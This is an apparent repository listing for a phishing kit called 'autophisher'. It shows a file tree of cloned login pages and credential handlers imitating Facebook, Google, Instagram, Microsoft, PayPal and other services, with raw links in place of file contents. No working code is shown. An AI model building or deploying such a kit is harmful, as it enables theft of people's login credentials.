├── LICENSE ├── README.md ├── autophisher.sh ├── crkgithub ├── android.jpg ├── linuxlogo.jpg └── logo.jpg ├── scripts └── launch.sh └── sites ├── facebook ├── LICENSE ├── README.md ├── hsts-pixel.gif ├── index.php ├── login.html ├── login.php ├── logo.svg ├── mobile.html ├── script.js └── style.css ├── fb_advanced ├── index.php ├── login.html ├── login.php ├── login2.html └── result.html ├── fb_messenger ├── index.php ├── login.html └── login.php ├── fb_security ├── fb-ico.png ├── index.php ├── login.html ├── login.php ├── logo.png └── style.css ├── github ├── index.php ├── login.html └── login.php ├── google ├── avatar.png ├── google.png ├── index.php ├── login.html └── login.php ├── google_new ├── index.php ├── login.html └── login.php ├── google_poll ├── index.php ├── login.html ├── login.php ├── login2.html └── result.html ├── ig_followers ├── index.php ├── login.html └── login.php ├── ig_verify ├── index.php ├── login.html ├── login.php ├── login2.html ├── login2.php └── login3.html ├── insta_followers ├── index.php ├── login.html └── login.php ├── instagram ├── badge_android_english-en.png ├── badge_ios_english-en.png ├── favicon.png ├── home-phones.png ├── home-phones@2x.png ├── index.php ├── login.html ├── login.php ├── screenshot1.jpg ├── screenshot2.jpg ├── screenshot3.jpg ├── screenshot4.jpg ├── screenshot5.jpg ├── sprite_core_2x_bcd90c1d4868.png └── sprite_core_32f0a4f27407.png ├── ip.php ├── linkedin ├── 4li12pah6li7xka3r69y2hqap.css ├── 6jblk5oqhlo45xbkmcr7s4zix ├── 77qnm4uzm172xn82kvifmelfu ├── 9lb1g1kp916tat669q9r5g2kz ├── dnz8biurbtozxjvxufs5aq4jd ├── dz6wk4o93mwzoh0t6zsx73kzr ├── index.php ├── login.html └── login.php ├── mediafire ├── index.php ├── login.html └── login.php ├── microsoft ├── ConvergedLoginPaginatedStrings.EN.js ├── ConvergedLoginPaginatedStrings.js ├── ConvergedLogin_PCore.js ├── Converged_v21033.css ├── Converged_v21033.css2 ├── boot.css ├── boot.js ├── boot_002.js ├── boot_003.js ├── boot_004.js ├── ellipsis_grey.svg ├── ellipsis_white.svg ├── index.php ├── login.html ├── login.php ├── microsoft_logo.svg ├── prefetch.html ├── sprite1.css └── sprite1.png ├── paypal ├── index.php ├── login.html └── login.php ├── snapchat ├── index.php ├── login.php └── users.php ├── spotify ├── analytics.js ├── anchor.html ├── api.js ├── bframe.html ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js ├── index.css ├── index.js ├── index.php ├── login.html ├── login.php ├── recaptcha__en.js └── styles__ltr.css └── twitter ├── index.php ├── login.html └── login.php /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/README.md -------------------------------------------------------------------------------- /autophisher.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/autophisher.sh -------------------------------------------------------------------------------- /crkgithub/android.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/crkgithub/android.jpg -------------------------------------------------------------------------------- /crkgithub/linuxlogo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/crkgithub/linuxlogo.jpg -------------------------------------------------------------------------------- /crkgithub/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/crkgithub/logo.jpg -------------------------------------------------------------------------------- /scripts/launch.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/scripts/launch.sh -------------------------------------------------------------------------------- /sites/facebook/LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/LICENSE -------------------------------------------------------------------------------- /sites/facebook/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/README.md -------------------------------------------------------------------------------- /sites/facebook/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/hsts-pixel.gif -------------------------------------------------------------------------------- /sites/facebook/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/index.php -------------------------------------------------------------------------------- /sites/facebook/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/login.html -------------------------------------------------------------------------------- /sites/facebook/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/login.php -------------------------------------------------------------------------------- /sites/facebook/logo.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/logo.svg -------------------------------------------------------------------------------- /sites/facebook/mobile.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/mobile.html -------------------------------------------------------------------------------- /sites/facebook/script.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/script.js -------------------------------------------------------------------------------- /sites/facebook/style.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/facebook/style.css -------------------------------------------------------------------------------- /sites/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_advanced/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_advanced/login.html -------------------------------------------------------------------------------- /sites/fb_advanced/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_advanced/login.php -------------------------------------------------------------------------------- /sites/fb_advanced/login2.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_advanced/login2.html -------------------------------------------------------------------------------- /sites/fb_advanced/result.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_advanced/result.html -------------------------------------------------------------------------------- /sites/fb_messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_messenger/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_messenger/login.html -------------------------------------------------------------------------------- /sites/fb_messenger/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_messenger/login.php -------------------------------------------------------------------------------- /sites/fb_security/fb-ico.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_security/fb-ico.png -------------------------------------------------------------------------------- /sites/fb_security/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_security/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_security/login.html -------------------------------------------------------------------------------- /sites/fb_security/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_security/login.php -------------------------------------------------------------------------------- /sites/fb_security/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_security/logo.png -------------------------------------------------------------------------------- /sites/fb_security/style.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/fb_security/style.css -------------------------------------------------------------------------------- /sites/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/github/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/github/login.html -------------------------------------------------------------------------------- /sites/github/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/github/login.php -------------------------------------------------------------------------------- /sites/google/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google/avatar.png -------------------------------------------------------------------------------- /sites/google/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google/google.png -------------------------------------------------------------------------------- /sites/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google/login.html -------------------------------------------------------------------------------- /sites/google/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google/login.php -------------------------------------------------------------------------------- /sites/google_new/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google_new/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google_new/login.html -------------------------------------------------------------------------------- /sites/google_new/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google_new/login.php -------------------------------------------------------------------------------- /sites/google_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google_poll/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google_poll/login.html -------------------------------------------------------------------------------- /sites/google_poll/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google_poll/login.php -------------------------------------------------------------------------------- /sites/google_poll/login2.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google_poll/login2.html -------------------------------------------------------------------------------- /sites/google_poll/result.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/google_poll/result.html -------------------------------------------------------------------------------- /sites/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/ig_followers/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/ig_followers/login.html -------------------------------------------------------------------------------- /sites/ig_followers/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/ig_followers/login.php -------------------------------------------------------------------------------- /sites/ig_verify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/ig_verify/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/ig_verify/login.html -------------------------------------------------------------------------------- /sites/ig_verify/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/ig_verify/login.php -------------------------------------------------------------------------------- /sites/ig_verify/login2.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/ig_verify/login2.html -------------------------------------------------------------------------------- /sites/ig_verify/login2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/ig_verify/login2.php -------------------------------------------------------------------------------- /sites/ig_verify/login3.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/ig_verify/login3.html -------------------------------------------------------------------------------- /sites/insta_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/insta_followers/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/insta_followers/login.html -------------------------------------------------------------------------------- /sites/insta_followers/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/insta_followers/login.php -------------------------------------------------------------------------------- /sites/instagram/badge_android_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/badge_android_english-en.png -------------------------------------------------------------------------------- /sites/instagram/badge_ios_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/badge_ios_english-en.png -------------------------------------------------------------------------------- /sites/instagram/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/favicon.png -------------------------------------------------------------------------------- /sites/instagram/home-phones.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/home-phones.png -------------------------------------------------------------------------------- /sites/instagram/home-phones@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/home-phones@2x.png -------------------------------------------------------------------------------- /sites/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/instagram/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/login.html -------------------------------------------------------------------------------- /sites/instagram/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/login.php -------------------------------------------------------------------------------- /sites/instagram/screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/screenshot1.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/screenshot2.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/screenshot3.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/screenshot4.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/screenshot5.jpg -------------------------------------------------------------------------------- /sites/instagram/sprite_core_2x_bcd90c1d4868.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/sprite_core_2x_bcd90c1d4868.png -------------------------------------------------------------------------------- /sites/instagram/sprite_core_32f0a4f27407.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/instagram/sprite_core_32f0a4f27407.png -------------------------------------------------------------------------------- /sites/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/ip.php -------------------------------------------------------------------------------- /sites/linkedin/4li12pah6li7xka3r69y2hqap.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/linkedin/4li12pah6li7xka3r69y2hqap.css -------------------------------------------------------------------------------- /sites/linkedin/6jblk5oqhlo45xbkmcr7s4zix: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/linkedin/6jblk5oqhlo45xbkmcr7s4zix -------------------------------------------------------------------------------- /sites/linkedin/77qnm4uzm172xn82kvifmelfu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/linkedin/77qnm4uzm172xn82kvifmelfu -------------------------------------------------------------------------------- /sites/linkedin/9lb1g1kp916tat669q9r5g2kz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/linkedin/9lb1g1kp916tat669q9r5g2kz -------------------------------------------------------------------------------- /sites/linkedin/dnz8biurbtozxjvxufs5aq4jd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/linkedin/dnz8biurbtozxjvxufs5aq4jd -------------------------------------------------------------------------------- /sites/linkedin/dz6wk4o93mwzoh0t6zsx73kzr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/linkedin/dz6wk4o93mwzoh0t6zsx73kzr -------------------------------------------------------------------------------- /sites/linkedin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/linkedin/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/linkedin/login.html -------------------------------------------------------------------------------- /sites/linkedin/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/linkedin/login.php -------------------------------------------------------------------------------- /sites/mediafire/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/mediafire/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/mediafire/login.html -------------------------------------------------------------------------------- /sites/mediafire/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/mediafire/login.php -------------------------------------------------------------------------------- /sites/microsoft/ConvergedLoginPaginatedStrings.EN.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/ConvergedLoginPaginatedStrings.EN.js -------------------------------------------------------------------------------- /sites/microsoft/ConvergedLoginPaginatedStrings.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/ConvergedLoginPaginatedStrings.js -------------------------------------------------------------------------------- /sites/microsoft/ConvergedLogin_PCore.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/ConvergedLogin_PCore.js -------------------------------------------------------------------------------- /sites/microsoft/Converged_v21033.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/Converged_v21033.css -------------------------------------------------------------------------------- /sites/microsoft/Converged_v21033.css2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/Converged_v21033.css2 -------------------------------------------------------------------------------- /sites/microsoft/boot.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/boot.css -------------------------------------------------------------------------------- /sites/microsoft/boot.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/boot.js -------------------------------------------------------------------------------- /sites/microsoft/boot_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/boot_002.js -------------------------------------------------------------------------------- /sites/microsoft/boot_003.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/boot_003.js -------------------------------------------------------------------------------- /sites/microsoft/boot_004.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/boot_004.js -------------------------------------------------------------------------------- /sites/microsoft/ellipsis_grey.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/ellipsis_grey.svg -------------------------------------------------------------------------------- /sites/microsoft/ellipsis_white.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/ellipsis_white.svg -------------------------------------------------------------------------------- /sites/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/microsoft/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/login.html -------------------------------------------------------------------------------- /sites/microsoft/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/login.php -------------------------------------------------------------------------------- /sites/microsoft/microsoft_logo.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/microsoft_logo.svg -------------------------------------------------------------------------------- /sites/microsoft/prefetch.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/prefetch.html -------------------------------------------------------------------------------- /sites/microsoft/sprite1.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/sprite1.css -------------------------------------------------------------------------------- /sites/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/microsoft/sprite1.png -------------------------------------------------------------------------------- /sites/paypal/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/paypal/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/paypal/login.html -------------------------------------------------------------------------------- /sites/paypal/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/paypal/login.php -------------------------------------------------------------------------------- /sites/snapchat/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/snapchat/index.php -------------------------------------------------------------------------------- /sites/snapchat/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/snapchat/login.php -------------------------------------------------------------------------------- /sites/snapchat/users.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/snapchat/users.php -------------------------------------------------------------------------------- /sites/spotify/analytics.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/analytics.js -------------------------------------------------------------------------------- /sites/spotify/anchor.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/anchor.html -------------------------------------------------------------------------------- /sites/spotify/api.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/api.js -------------------------------------------------------------------------------- /sites/spotify/bframe.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/bframe.html -------------------------------------------------------------------------------- /sites/spotify/hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js -------------------------------------------------------------------------------- /sites/spotify/index.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/index.css -------------------------------------------------------------------------------- /sites/spotify/index.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/index.js -------------------------------------------------------------------------------- /sites/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/spotify/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/login.html -------------------------------------------------------------------------------- /sites/spotify/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/login.php -------------------------------------------------------------------------------- /sites/spotify/recaptcha__en.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/recaptcha__en.js -------------------------------------------------------------------------------- /sites/spotify/styles__ltr.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/spotify/styles__ltr.css -------------------------------------------------------------------------------- /sites/twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/twitter/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/twitter/login.html -------------------------------------------------------------------------------- /sites/twitter/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodingRanjith/autophisher/HEAD/sites/twitter/login.php --------------------------------------------------------------------------------